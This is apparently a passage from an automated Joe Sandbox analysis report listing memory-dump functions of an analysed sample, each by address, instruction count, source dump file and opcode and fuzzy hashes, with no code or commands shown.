                    Function 00007FF848F3124A Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: 8b44ec19be4e4032c5d1299d5d7db91599e79a7125ef10e60cd8b8346b714837
                    • Instruction ID: fe47509d000de397c1de0b066bda96767c29271a00c15e57403c1d64ed9fc325
                    • Opcode Fuzzy Hash: 8b44ec19be4e4032c5d1299d5d7db91599e79a7125ef10e60cd8b8346b714837
                    • Instruction Fuzzy Hash: 71A17234A18A1D8FDB98EF58C894BA8B7F1FF69301F5541A9D00DE72A5DB74AD81CB00
                    Function 00007FF848F309D3 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8xH
                    • API String ID: 0-4181425785
                    • Opcode ID: 4f7a12721a482e77933c61541bebb781787390e73431bf6be5f78e1b7210b6bf
                    • Instruction ID: 087790ecb85234b35e36320e0b90072310594d14e9172c677fddd2033d84ea0a
                    • Opcode Fuzzy Hash: 4f7a12721a482e77933c61541bebb781787390e73431bf6be5f78e1b7210b6bf
                    • Instruction Fuzzy Hash: 2CE09A76D5892E8FDB84FB58D8555FD7361FB94350F010527D40DD7181DB2468158744
                    Function 00007FF848F34843 Relevance: .2, Instructions: 248COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 37ac285e6804779d2cae07b6677fad91cc9be36b1cbd8a7cbc186e6010e28f71
                    • Instruction ID: 6e7224bb4a7e7d269162fadea42b06bf8201c0db1ac7a2bfa6facfa78ba5f95f
                    • Opcode Fuzzy Hash: 37ac285e6804779d2cae07b6677fad91cc9be36b1cbd8a7cbc186e6010e28f71
                    • Instruction Fuzzy Hash: EC91F270D19A1D9FDB94EFA8D845BEDB7B1FF58340F1041AAD00DE3292DB38A9858B44
                    Function 00007FF848F34345 Relevance: .2, Instructions: 239COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eb22da38b5bd75eb0f65fa6eb28d21aeb76a3dbbdbfb2b21562978eae6468d3f
                    • Instruction ID: 5e91070354dd96366dd68f45a87d7f8b505527a9971c372236982814868f5759
                    • Opcode Fuzzy Hash: eb22da38b5bd75eb0f65fa6eb28d21aeb76a3dbbdbfb2b21562978eae6468d3f
                    • Instruction Fuzzy Hash: 86813B72C1E6C65FE355ABA8A8110B97FA0FF72794F1800BBD44C871D7DF19A8098399
                    Function 00007FF848F30DD9 Relevance: .2, Instructions: 216COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b1b36b51483ae6b4210cdec1965ef8d7a6cedc2ee5573bad85a74841f4927800
                    • Instruction ID: e68dd2e76b74cfd8d1abd5ff3b2af8fe47522f85e06f4ba18560153d36eb5d35
                    • Opcode Fuzzy Hash: b1b36b51483ae6b4210cdec1965ef8d7a6cedc2ee5573bad85a74841f4927800
                    • Instruction Fuzzy Hash: 1B714D30A1994E9FDB84FF68C495AE9B7B1FF98340F1445A6D409D7296CA38A881CB90
                    Function 00007FF848F308B1 Relevance: .2, Instructions: 201COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1e1f31168733cad57b31546bd9769f3bb4235adbfe1b82ce6f4ddd8a0be17904
                    • Instruction ID: 11a379788320401618f94cb3b29dc1e4b7b32bc25c58716beb111be9982ce04f
                    • Opcode Fuzzy Hash: 1e1f31168733cad57b31546bd9769f3bb4235adbfe1b82ce6f4ddd8a0be17904
                    • Instruction Fuzzy Hash: 55519E3191DA4E8FEB98FF68C8586A9BBA1FF98340F4401BBD409D72D2DB34A841C744
                    Function 00007FF848F34F5C Relevance: .2, Instructions: 193COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ce8a7248aad81d665672add536b3d0867379f74d55bf575582c5324555c89c8a
                    • Instruction ID: 823d76bbab1d50eba4fedb9a8ad7065634a97a4d062d8ed1c72b4f3709b3c25e
                    • Opcode Fuzzy Hash: ce8a7248aad81d665672add536b3d0867379f74d55bf575582c5324555c89c8a
                    • Instruction Fuzzy Hash: 3471C370D0992C9FDBA5EF58D895BE9B7F1FB98300F5001AAD00DE7291DB35AA85CB40
                    Function 00007FF848F360C5 Relevance: .2, Instructions: 187COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2f50babe8418b6f74cc1b5d176e659f49dc2170c5406e303dc3423e33446078d
                    • Instruction ID: 176e9786b10ffe43a05ca0341ea28a048fb5a59c359aa15be5fa5c03fac8be4c
                    • Opcode Fuzzy Hash: 2f50babe8418b6f74cc1b5d176e659f49dc2170c5406e303dc3423e33446078d
                    • Instruction Fuzzy Hash: E6518971C0CA59CFEB96EB6888557A8BBB1FF55340F4401BAC009D72C2DB3CA885DB41
                    Function 00007FF848F3190D Relevance: .2, Instructions: 173COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 668a4ff864c44c21781ed50264ff871fd35401159c53e8451de6ce7efef622a7
                    • Instruction ID: c889798b965f0532f045d3c4d93a7625c5f30e6d53abd3118b7b0b6ab1a697aa
                    • Opcode Fuzzy Hash: 668a4ff864c44c21781ed50264ff871fd35401159c53e8451de6ce7efef622a7
                    • Instruction Fuzzy Hash: D751CA71D1955D9FDB98EB58C895BA8B7B1FF58340F1440BAD00DE7296CF38A880CB04
                    Function 00007FF848F34611 Relevance: .2, Instructions: 171COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0eb44970da94d333e43038934e2f1f70623279f1e120dd391f7a574b0802787d
                    • Instruction ID: 209ecc307bc85a56483cea9828f0b2dd6830c19d497da4fed32fb34bd9e60be9
                    • Opcode Fuzzy Hash: 0eb44970da94d333e43038934e2f1f70623279f1e120dd391f7a574b0802787d
                    • Instruction Fuzzy Hash: 9051B270E19A1D8FDB94EF98D899BADBBB1FF68301F10016AD00DE7291DB346981CB44
                    Function 00007FF848F30AB9 Relevance: .2, Instructions: 159COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 56051f872494983489999da76f5189d60c2ad33b9e5fb8af54dd03bbca6e0986
                    • Instruction ID: 809f0658bda65252b931ee3cb1367d0d1c2a7b64def4d590c15d18ee87a1c388
                    • Opcode Fuzzy Hash: 56051f872494983489999da76f5189d60c2ad33b9e5fb8af54dd03bbca6e0986
                    • Instruction Fuzzy Hash: 0451E370D18A5D8FDB98EF98C8986EDBBB1FFA8341F14012BD409E7295CB74A845CB44
                    Function 00007FF848F338B8 Relevance: .2, Instructions: 151COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c8e42758a437ba0b08f530d80495f1f54f88defeab0738e3beaddb46c0bd3f1c
                    • Instruction ID: b444c4b12cfc7a860bee8ff9f603b90a26fdbe328aa6f2240f8fcbb3e05224fc
                    • Opcode Fuzzy Hash: c8e42758a437ba0b08f530d80495f1f54f88defeab0738e3beaddb46c0bd3f1c
                    • Instruction Fuzzy Hash: E7416A70E1DA1D9FDB44EF98D855AEEBBB1FF58340F10017AD00AE7281DB39A9018B55
                    Function 00007FF848F367ED Relevance: .1, Instructions: 148COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b2e599152a82091bacd343d9e777d4fbae2a94ef7c91a9534d0b1f1176f133fc
                    • Instruction ID: d92006aec6f97470e4f273bb07bfad76693cc89edb3ca5be37868d37553cc6c2
                    • Opcode Fuzzy Hash: b2e599152a82091bacd343d9e777d4fbae2a94ef7c91a9534d0b1f1176f133fc
                    • Instruction Fuzzy Hash: 9D51783180E7898FDB55AB6498682FE7BB0EF1A311F1505BBD004E71D2EB385A48DB52
                    Function 00007FF848F3535F Relevance: .1, Instructions: 135COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 02e7afb8803498c8dd9ac7bb3910c7300edb5f814512262a124bf686a833e116
                    • Instruction ID: 703fb520367f123c13d0dad645242c45455f1b7a92d66425c201c98a86fa40c4
                    • Opcode Fuzzy Hash: 02e7afb8803498c8dd9ac7bb3910c7300edb5f814512262a124bf686a833e116
                    • Instruction Fuzzy Hash: 7641D670D1895D9FDF94EBACD895AACBBF1FF68341F50016AD00DE7296DB34A8818B40
                    Function 00007FF848F30C6D Relevance: .1, Instructions: 125COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b7065de26bd0768e5ee8c3ef9a91ebeec2cbd939683635d6e8fc35d3443db261
                    • Instruction ID: 79a74a36a3fb1a46cacddae45bd3b1beaa7fdfe9774b4f41e2785e162e333133
                    • Opcode Fuzzy Hash: b7065de26bd0768e5ee8c3ef9a91ebeec2cbd939683635d6e8fc35d3443db261
                    • Instruction Fuzzy Hash: BA411471C0961D8FDB80EFA8D4486EDBBB0FF55340F50047AE409E7292DB78A945CB94
                    Function 00007FF848F31521 Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7dad90c35a913a91806231750b7cf3752ce9d31dc0c6b1cbc2e4b04d23d52bde
                    • Instruction ID: 3ce9ae0f0bc889c1ba0d051b8ba53bf9d293bf343efe3b03bcef4eb6863704e0
                    • Opcode Fuzzy Hash: 7dad90c35a913a91806231750b7cf3752ce9d31dc0c6b1cbc2e4b04d23d52bde
                    • Instruction Fuzzy Hash: D541D634A1891D8FDF98EB58C895BACB7F1FF58344F5440AAE04EE3291DF74A9818B40
                    Function 00007FF848F30AD0 Relevance: .1, Instructions: 113COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 185bafd8b6f801025c41950a184689b195e662046426f1d0f2b0e7816fe02c23
                    • Instruction ID: 3952733efa99eb53d29e263af2b8324039295f9366fb1665ca29fd00bfaac9b5
                    • Opcode Fuzzy Hash: 185bafd8b6f801025c41950a184689b195e662046426f1d0f2b0e7816fe02c23
                    • Instruction Fuzzy Hash: 0A31C770D18A1D9FDF94EF58D885BEEBBB1FBA8345F10012AD409E3295CB35A845CB84
                    Function 00007FF848F34BE9 Relevance: .1, Instructions: 105COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5f2b34fca8d15049b7d425e6559031bee2720b0d74b8ec5ecf25787f3f97cfd8
                    • Instruction ID: 7df63d1a830487d14928a9e7202a37a9b791b6d5cb19b65451ff17d813e12b44
                    • Opcode Fuzzy Hash: 5f2b34fca8d15049b7d425e6559031bee2720b0d74b8ec5ecf25787f3f97cfd8
                    • Instruction Fuzzy Hash: BC416D70D0D6598FE756EBA4C8586E9BBF1FF69340F5001BAD009D7292CB389982CB40
                    Function 00007FF848F31129 Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 24341bd063709b7bbcda917365c7fad30c847e8dff0c0bd4aed77d5c3bd60959
                    • Instruction ID: 1831f3a81f698f656277480ea69a602120ad24bf07fb9db6a6501f22f22de6a4
                    • Opcode Fuzzy Hash: 24341bd063709b7bbcda917365c7fad30c847e8dff0c0bd4aed77d5c3bd60959
                    • Instruction Fuzzy Hash: 40217C3190895D9FDB81EF68D855AEDBBF5FF58310F00016BE408E3291CA249841C790
                    Function 00007FF848F33A8D Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b3cd772792b14d0220d7effd9ceffa48aab84d2dbf7416f854d553f505f1ddb6
                    • Instruction ID: c3d9a1e0fd0a256aca4248eb905369a6f008b040638b3d8b7591eeebeaf255d1
                    • Opcode Fuzzy Hash: b3cd772792b14d0220d7effd9ceffa48aab84d2dbf7416f854d553f505f1ddb6
                    • Instruction Fuzzy Hash: C021DE72E0DA8E8FEB95EB289C642A5BBA1FF41341F0801BAD048D72D2DF396841C740
                    Function 00007FF848F34555 Relevance: .1, Instructions: 87COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6aa35cefc8eda4f0bcd4a1e0c40a46c1d9ba879b6902ec46f5d985c7e8aefd94
                    • Instruction ID: 2208395772a1054ff2ddb8c184aa0d0c1d95a1684ce1021637905946e978331d
                    • Opcode Fuzzy Hash: 6aa35cefc8eda4f0bcd4a1e0c40a46c1d9ba879b6902ec46f5d985c7e8aefd94
                    • Instruction Fuzzy Hash: 65310071C1EAC98FE785EF2898142A93FB0FFA6240F4401BBE448C32D3DB285945C799
                    Function 00007FF848F33F00 Relevance: .1, Instructions: 85COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 42f4d21ce0fcbd75e36a720f4eb8c7e208ff09149967d201fb19091555286ec2
                    • Instruction ID: 5759e07d036be748c542f5c3b3754883320783fccf4dd12e483c2842513270f2
                    • Opcode Fuzzy Hash: 42f4d21ce0fcbd75e36a720f4eb8c7e208ff09149967d201fb19091555286ec2
                    • Instruction Fuzzy Hash: FF314A30D0961A8FE7A8EB28C8593B9B7B1EF94350F1005BAD45DD72D2CF39A981CB44
                    Function 00007FF848F33F0B Relevance: .1, Instructions: 77COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8e948658f711d28b4a72f173c5c28842ef5d17fd87bae9d950e642ef384bc58d
                    • Instruction ID: 6e1b73648d3be654aa84de8a46bd408c1c58b9d7a5ab29aab687c53847492de9
                    • Opcode Fuzzy Hash: 8e948658f711d28b4a72f173c5c28842ef5d17fd87bae9d950e642ef384bc58d
                    • Instruction Fuzzy Hash: 87219D31E0D20A9EE768EB68D8456B9B3B1EF95350F10047AD51D932D2CF39A981CB44
                    Function 00007FF848F31048 Relevance: .1, Instructions: 74COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f6de1c39f3c61c08f256f571ae015e07cd6bb650836d9e5be3498c178c0ef4e0
                    • Instruction ID: df27113ec3b048840facd19d0c22ad48332518d2f5b6236fc905511555b8a4b5
                    • Opcode Fuzzy Hash: f6de1c39f3c61c08f256f571ae015e07cd6bb650836d9e5be3498c178c0ef4e0
                    • Instruction Fuzzy Hash: B3219274A1891D9FDF84EF48D495EEEBBB1FF68301F10416AE509E3255CB34E8418B94
                    Function 00007FF848F33F43 Relevance: .1, Instructions: 73COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 84a2c4896f2908762eee6424abc0d63750192936118100ad0c93f276ae0e6c58
                    • Instruction ID: d11e549175d7a161452aa2c3c8ba34709b03ef6e208cb99b2aa55082e00d3c74
                    • Opcode Fuzzy Hash: 84a2c4896f2908762eee6424abc0d63750192936118100ad0c93f276ae0e6c58
                    • Instruction Fuzzy Hash: A3219A30D0E7898FE769EB68C8197B9BBB0EF56350F0400BAD009D32D2CE389884CB51
                    Function 00007FF848F33FC1 Relevance: .1, Instructions: 66COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3067a960245212ae32d0b2534974d4730b46238c1c99dfa298dd40864f88d04a
                    • Instruction ID: 90ee1616f1261fb80d70e4f63fc0f983706d79182bb91efdba4ffcfe1fc8b1b2
                    • Opcode Fuzzy Hash: 3067a960245212ae32d0b2534974d4730b46238c1c99dfa298dd40864f88d04a
                    • Instruction Fuzzy Hash: A411EF7090E78E4FE766AB7488247B97FB1EF96710F0804BAD049D72C3CE289844C751
                    Function 00007FF848F33F62 Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5acbeb819a5d047513eb37b013558d8df2f2d8f97c42e811f1c122622ab005ea
                    • Instruction ID: f79f5d11ffadb5da644a9d5774be393b1c4441713a5af5ba1352b6aa2f7b4c3c
                    • Opcode Fuzzy Hash: 5acbeb819a5d047513eb37b013558d8df2f2d8f97c42e811f1c122622ab005ea
                    • Instruction Fuzzy Hash: 14119E30D0D60A9FE768EB68C4097BAB6B1EFA5790F10153AE40DD32C1CF39A8448A55
                    Function 00007FF848F33F86 Relevance: .1, Instructions: 59COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e4fd26ce6ceed72704ccacbfab46f61279af681a88b1d25819949b929121af89
                    • Instruction ID: 8e38062f09769db64c0bd6bf2843b831148c890b329d31ba5b7d4e2bcbbed7fe
                    • Opcode Fuzzy Hash: e4fd26ce6ceed72704ccacbfab46f61279af681a88b1d25819949b929121af89
                    • Instruction Fuzzy Hash: EE114C74D0D64A8EE7A8FF68D4153B977B1EFA9790F14143AD40D972C6CF39A8818B08
                    Function 00007FF848F33F74 Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5095f12c18daf664fee1a4213ea117355f81cdd4c2f35178e10e48ac166803dc
                    • Instruction ID: c67585e6f566ef50767a98c6eb0adc7a1b2b3499f58b97886dc01000fd7beb40
                    • Opcode Fuzzy Hash: 5095f12c18daf664fee1a4213ea117355f81cdd4c2f35178e10e48ac166803dc
                    • Instruction Fuzzy Hash: D3118E70D0DA4A8FE7A8EF68C4153B9B7B1EF98750F54043AD40DD72C2CF39A8818648
                    Function 00007FF848F33EEC Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 64c1158d1a6aedcebd901c33846296404108b6622ae41303f7aa5351e15dbd80
                    • Instruction ID: cd71f1c24c82e119973dd14bd70e1059ca1edd7a327691b2d0d062028a86ca1a
                    • Opcode Fuzzy Hash: 64c1158d1a6aedcebd901c33846296404108b6622ae41303f7aa5351e15dbd80
                    • Instruction Fuzzy Hash: EC11A070D0E74A8FE769EB28C5193B9BBB1EF56750F04147AE419D72D2CF3968408705
                    Function 00007FF848F33F6B Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fef288c496fc1a0d8f349e3f9f928a308b21917160d86fd485b9fe94de7c0282
                    • Instruction ID: 0b8aeb4af75e0a14b7f351bf0bcfc3ea94ac8e69750e3d0b95e95ea1c28b2391
                    • Opcode Fuzzy Hash: fef288c496fc1a0d8f349e3f9f928a308b21917160d86fd485b9fe94de7c0282
                    • Instruction Fuzzy Hash: DD016970D0E64A8FE768EB64C5193B9BBB1EF99750F04187AD009E72D2CF39A8418B15
                    Function 00007FF848F36680 Relevance: .0, Instructions: 50COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d6c1f2a00b60af7f3e96cf397d8ad8234a23d8dd74b9aa99ac8b4c5233639ec7
                    • Instruction ID: 30463fb7bfb9c4b512ad0f9d62fe240f32766ec263851ee5595ecf5af819dba7
                    • Opcode Fuzzy Hash: d6c1f2a00b60af7f3e96cf397d8ad8234a23d8dd74b9aa99ac8b4c5233639ec7
                    • Instruction Fuzzy Hash: 4301DC31C48A4C8FCB54EF1AAC002D877B4FB9A318F00026AD44CD7180E3759A9ACB45
                    Function 00007FF848F310EA Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8304b697ef5cfb8e12454b9dfe7681862135819567abc9b7ee2ed61404d6c3ce
                    • Instruction ID: bbbe37285ffb19ffa4420ce6195e9bf2e2969118bc2c2eb8c7a26f5191e8e657
                    • Opcode Fuzzy Hash: 8304b697ef5cfb8e12454b9dfe7681862135819567abc9b7ee2ed61404d6c3ce
                    • Instruction Fuzzy Hash: FBE09236D0C94D4FEB91BF68A8076E5BBA4FB8A308F00007AE55CC3191C7259595C785

                    Executed Functions

                    Function 00007FF848F327F6 Relevance: 2.7, Strings: 2, Instructions: 220COMMON
                    Download Yara Rule
                    Strings
